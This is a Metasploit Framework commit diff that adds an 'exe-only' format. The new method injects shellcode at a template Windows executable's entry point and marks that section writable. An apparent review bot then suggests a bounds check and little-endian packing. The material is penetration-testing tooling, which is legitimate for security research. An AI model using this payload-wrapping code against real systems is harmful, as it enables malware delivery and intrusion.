
Commit 79a72a1

committed
Merge branch 'exe_only_patch' of git://github.com/agix/metasploit-framework
2 parents e25a06c + e567597 commit 79a72a1


1 file changed

+41
-1
lines changed


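--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -364,6 +364,41 @@ def self.to_win32pe(framework, code, opts={})
 exe
 end
 
+def self.to_win32pe_only(framework, code, opts={})
+
+# Allow the user to specify their own EXE template
+set_template_default(opts, "template_x86_windows_old.exe")
+
+pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
+
+exe = ''
+File.open(opts[:template], 'rb') { |fd|
+exe = fd.read(fd.stat.size)
+}
+
+sections_header = []
+pe._file_header.v['NumberOfSections'].times { |i| sections_header << [(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18+0x24),exe[(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18),0x28]] }
+
+
+#look for section with entry point
+sections_header.each do |sec|
+virtualAddress = sec[1][0xc,0x4].unpack('L')[0]
+sizeOfRawData = sec[1][0x10,0x4].unpack('L')[0]
+characteristics = sec[1][0x24,0x4].unpack('L')[0]
+if pe.hdr.opt.AddressOfEntryPoint >= virtualAddress && pe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData
+#put this section writable
+characteristics|=0x80000000
+newcharacteristics = [characteristics].pack('L')
+exe[sec[0],newcharacteristics.length]=newcharacteristics
+end
+end
+
+#put the shellcode at the entry point, overwriting template
+exe[pe.rva_to_file_offset(pe.hdr.opt.AddressOfEntryPoint),code.length]=code
+
+return exe
+end
+
 
 def self.to_win32pe_old(framework, code, opts={})
 
@@ -1930,6 +1965,11 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
 output = Msf::Util::EXE.to_win32pe_old(framework, code, exeopts)
 end
 
+when 'exe-only'
+if(not arch or (arch.index(ARCH_X86)))
+output = Msf::Util::EXE.to_win32pe_only(framework, code, exeopts)
+end
+
 when 'elf'
 if (not plat or (plat.index(Msf::Module::Platform::Linux)))
 if (not arch or (arch.index(ARCH_X86)))
@@ -1994,7 +2034,7 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
 end
 
 def self.to_executable_fmt_formats
-['dll','exe','exe-small','elf','macho','vba','vba-exe','vbs','loop-vbs','asp','aspx','war','psh','psh-net']
+['dll','exe','exe-small','exe-only','elf','macho','vba','vba-exe','vbs','loop-vbs','asp','aspx','war','psh','psh-net']
 end
 
 #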
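Review bot: The payload write at line 397 of `to_win32pe_only`, `exe[pe.rva_to_file_offset(pe.hdr.opt.AddressOfEntryPoint),code.length]=code`, is unbounded: `sizeOfRawData` is read at line 386 but never used to check that `code` fits between the entry point and the end of that section, so an oversized payload silently clobbers whatever follows in the file (or extends it) and the method returns a corrupt executable instead of raising. The loop at lines 384–394 also never records whether any section matched, so a template whose entry point lies outside every section's raw data gets the payload written with no section marked writable and no diagnostic. Separately, the `unpack('L')`/`pack('L')` calls at lines 385–391 use host byte order while PE header fields are little-endian, so `'V'` is the directive that stays correct regardless of host. The rewrite below captures the remaining room in the entry section during the loop, raises with a clear message on both failure cases before touching the payload offset, and switches the directives to `'V'`; `to_win32pe_only` starts and ends inside this hunk.
```ruby
#look for section with entry point
entry_section_room = nil
sections_header.each do |sec|
  virtualAddress = sec[1][0xc,0x4].unpack('V')[0]
  sizeOfRawData = sec[1][0x10,0x4].unpack('V')[0]
  characteristics = sec[1][0x24,0x4].unpack('V')[0]
  next unless pe.hdr.opt.AddressOfEntryPoint >= virtualAddress && pe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData
  # bytes of raw section data from the entry point to the end of the section; bounds the payload write below
  entry_section_room = (virtualAddress + sizeOfRawData) - pe.hdr.opt.AddressOfEntryPoint
  #put this section writable
  characteristics|=0x80000000
  exe[sec[0],4] = [characteristics].pack('V')
end

raise RuntimeError, "No section in #{opts[:template]} contains the entry point" unless entry_section_room
if code.length > entry_section_room
  raise RuntimeError, "Payload (#{code.length} bytes) does not fit in the template's entry-point section (#{entry_section_room} bytes available)"
end

#put the shellcode at the entry point, overwriting template
# … unchanged: payload write and return …
```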
